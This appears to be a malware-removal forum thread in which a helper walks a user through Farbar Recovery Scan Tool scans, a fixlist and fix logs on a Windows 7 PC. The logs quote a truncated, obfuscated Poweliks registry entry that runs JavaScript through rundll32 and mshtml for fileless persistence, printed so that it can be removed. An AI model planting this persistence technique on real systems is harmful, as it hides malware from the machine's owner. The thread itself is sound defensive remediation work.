CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll (Microsoft Corporation)

==================== Restore Points  =========================

30-10-2014 16:21:48 Scheduled Checkpoint
31-10-2014 09:41:41 Removed Java™ 6 Update 16 (64-bit)
31-10-2014 09:46:03 Removed Java™ 6 Update 33
31-10-2014 10:25:32 Installed Java 7 Update 71
31-10-2014 10:28:23 Removed Java 7 Update 71

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {128D76C8-7028-468B-977E-C90117E68814} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {3304AF05-A723-4069-A962-EAD84FAC017E} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {90409AC3-C03C-4F43-B367-6CDE097B0ADB} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {96E7D4EB-E47C-4C6B-9C36-79FB1D4DA37C} - System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} => C:\Windows\system32\bdhpl.dll/s "C:\Windows\system32\bdhpl.dll"
Task: {A653F635-2846-46C9-9F0D-D61FF57E3FBF} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {D50DCB71-264E-42D1-ADAA-9ABF4048AADA} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {D854CD5A-DB3B-41A2-9D10-C6B6BFFECB0F} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {F97F77C6-5696-408F-89F1-17A24D6C26F6} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2010-07-28] (Lenovo Group Limited)
Task: {FCCB621B-E6E2-41C3-B70A-323C5506BF37} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Loaded Modules (whitelisted) =============

2012-02-12 01:03 - 2005-03-12 01:07 - 00087040 ____N () C:\Windows\System32\pdfcmnnt.dll
2011-11-26 19:50 - 2010-04-22 01:20 - 00177152 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
2014-08-11 11:49 - 2014-08-11 11:49 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2013-09-23 08:34 - 2014-08-26 02:46 - 02640408 _____ () C:\Program Files (x86)\AVG Secure Search\vprot.exe
2011-11-26 19:50 - 2010-07-27 12:04 - 00029184 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-11-26 19:50 - 2008-11-27 03:16 - 00018432 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
2011-11-26 19:50 - 2010-06-01 22:37 - 00228352 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
2009-05-28 01:09 - 2009-05-28 01:09 - 00049976 ____N () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2012-02-28 11:20 - 2011-12-22 23:08 - 00051848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2012-02-28 11:20 - 2008-11-25 17:18 - 01291264 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2012-02-28 11:20 - 2004-10-05 03:08 - 00055808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00114312 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExchBackupSize.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00245896 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00069768 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00064648 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2012-02-28 11:20 - 2011-12-23 15:15 - 00023176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00093832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2011-11-26 19:46 - 2009-07-15 20:20 - 00077824 ____N () C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2014-08-11 11:49 - 2014-08-11 11:49 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2012-02-12 12:44 - 2012-02-12 12:44 - 00315392 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANPDApi.dll
2012-02-12 12:43 - 2010-03-19 19:14 - 00294912 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\WlanApp.dll
2013-12-09 13:21 - 2014-03-21 08:19 - 01603608 _____ () C:\Program Files (x86)\AVG Secure Search\TBAPI.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-606911418-3109034106-3922174115-500 - Administrator - Enabled) => C:\Users\Administrator
Brenda (S-1-5-21-606911418-3109034106-3922174115-1001 - Limited - Enabled) => C:\Users\Brenda
Deborah (S-1-5-21-606911418-3109034106-3922174115-1000 - Administrator - Enabled) => C:\Users\Deborah
Diana (S-1-5-21-606911418-3109034106-3922174115-1053 - Administrator - Enabled)
Guest (S-1-5-21-606911418-3109034106-3922174115-501 - Limited - Disabled)
Nancy (S-1-5-21-606911418-3109034106-3922174115-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 11.0.9600.17344, time stamp: 0x541b85e6
Exception code: 0xc0000005
Fault offset: 0x00127417
Faulting process id: 0x25a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3580
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0034cf7e
Faulting process id: 0x1388
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2d2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x19ec
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x35f0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x25c8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x27f8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 08:21:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2220
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 06:02:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x3534
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3


System errors:
=============
Error: (11/02/2014 03:13:02 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/02/2014 02:14:16 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:51:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:51 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:31 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 10:50:30 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 06:25:23 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (11/02/2014 06:25:03 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.


Microsoft Office Sessions:
=========================
Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7jscript9.dll11.0.9600.17344541b85e6c00000050012741725a001cff6ba0e99d2f5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll238b432a-62ae-11e4-bdb2-50e549719966

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf358001cff6928245fff6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll4bec0c79-6286-11e4-bdb2-50e549719966

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0034cf7e138801cff6512a52db7fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll939db79e-6244-11e4-bdb2-50e549719966

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947652d2c01cff64c0f49d66cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll6afddfed-6240-11e4-bdb2-50e549719966

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476519ec01cff64be81db19bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll57cde7a4-623f-11e4-bdb2-50e549719966

Error: (11/01/2014 10:17:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476535f001cff64b5e350963C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlld42ce66d-623e-11e4-bdb2-50e549719966

Error: (11/01/2014 10:08:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf25c801cff64a1ba4cb84C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll89126c6e-623d-11e4-bdb2-50e549719966

Error: (11/01/2014 09:48:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf27f801cff6475c4151c6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc8feb523-623a-11e4-bdb2-50e549719966

Error: (11/01/2014 08:21:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094765222001cff63b2444c0d8C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll95d325fd-622e-11e4-bdb2-50e549719966

Error: (11/01/2014 06:02:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094765353401cff627a490641cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll26fe6ea3-621b-11e4-bdb2-50e549719966


==================== Memory info ===========================

Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 62%
Total physical RAM: 3551.17 MB
Available physical RAM: 1346.08 MB
Total Pagefile: 8076.92 MB
Available Pagefile: 3663.59 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:221.95 GB) (Free:85.95 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: B2D7266B)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=221.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:10:07 PM

Posted 02 November 2014 - 04:34 PM

Ok thanks for the info. we will use FRST;

 

Copy/paste whats below in the quote box into notepad. Save it as fixlist.txt in the same dir. you have FRST --> C:\Users\Deborah\Downloads

 

Run FRST64 and this time press the Fix button just once and wait.
The tool will make a log on the desktop (Fixlog.txt) please post it to your reply

 

 

C:\Users\Deborah\en_res.dll
C:\Users\Deborah\es_res.dll
C:\Users\Deborah\fr_res.dll
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\Deborah\grm_res.dll
C:\Users\Deborah\it_res.dll
C:\Users\Deborah\jp_res.dll
C:\Users\Deborah\mfc80u.dll
C:\Users\Deborah\msvcr80.dll
C:\Users\Deborah\PCPE Setup.exe
C:\Users\Deborah\pt_res.dll
C:\Users\Deborah\ResourceReader.dll
C:\Users\Deborah\ru_res.dll
C:\Users\Deborah\zh_res.dll

HKLM-x32\...\Run: [] => [X]

SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File

HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

EmptyTemp:

 

 


How Can I Reduce My Risk to Malware?


#5 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 02 November 2014 - 08:07 PM

Here is the result: Also, before I could get this log, the PC reboot itself.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-02 17:49:34 Run:1
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
C:\Users\Deborah\en_res.dll
C:\Users\Deborah\es_res.dll
C:\Users\Deborah\fr_res.dll
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\Deborah\grm_res.dll
C:\Users\Deborah\it_res.dll
C:\Users\Deborah\jp_res.dll
C:\Users\Deborah\mfc80u.dll
C:\Users\Deborah\msvcr80.dll
C:\Users\Deborah\PCPE Setup.exe
C:\Users\Deborah\pt_res.dll
C:\Users\Deborah\ResourceReader.dll
C:\Users\Deborah\ru_res.dll
C:\Users\Deborah\zh_res.dll

HKLM-x32\...\Run: [] => [X]

SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File

HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

EmptyTemp:
*****************

C:\Users\Deborah\en_res.dll => Moved successfully.
C:\Users\Deborah\es_res.dll => Moved successfully.
C:\Users\Deborah\fr_res.dll => Moved successfully.
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe => Moved successfully.
C:\Users\Deborah\grm_res.dll => Moved successfully.
C:\Users\Deborah\it_res.dll => Moved successfully.
C:\Users\Deborah\jp_res.dll => Moved successfully.
C:\Users\Deborah\mfc80u.dll => Moved successfully.
C:\Users\Deborah\msvcr80.dll => Moved successfully.
C:\Users\Deborah\PCPE Setup.exe => Moved successfully.
C:\Users\Deborah\pt_res.dll => Moved successfully.
C:\Users\Deborah\ResourceReader.dll => Moved successfully.
C:\Users\Deborah\ru_res.dll => Moved successfully.
C:\Users\Deborah\zh_res.dll => Moved successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
"HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}" => Key not found.
"HKU\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{95B7759C-8C7F-4BF1-B163-73684A933233} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}" => Key not found.
"HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
EmptyTemp: => Removed 6.6 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====



#6 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:10:07 PM

Posted 02 November 2014 - 09:03 PM

Hi,

Ok thanks for the info. Run FRST again like you did before- but before hitting the scan button put a checkmark next to addition.txt (under Optional Scan) and then click the scan button. Please post the new logs which you can find in the same dir.as  FRST is in: C:\Users\Deborah\Downloads

 


How Can I Reduce My Risk to Malware?


#7 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:09:07 PM

Posted 02 November 2014 - 10:18 PM

Thank you. here are the new logs as requested:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Deborah (administrator) on ASSISTANT on 02-11-2014 22:14:52
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
() C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_comm_customer.exe
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_system_customer.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_user_customer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
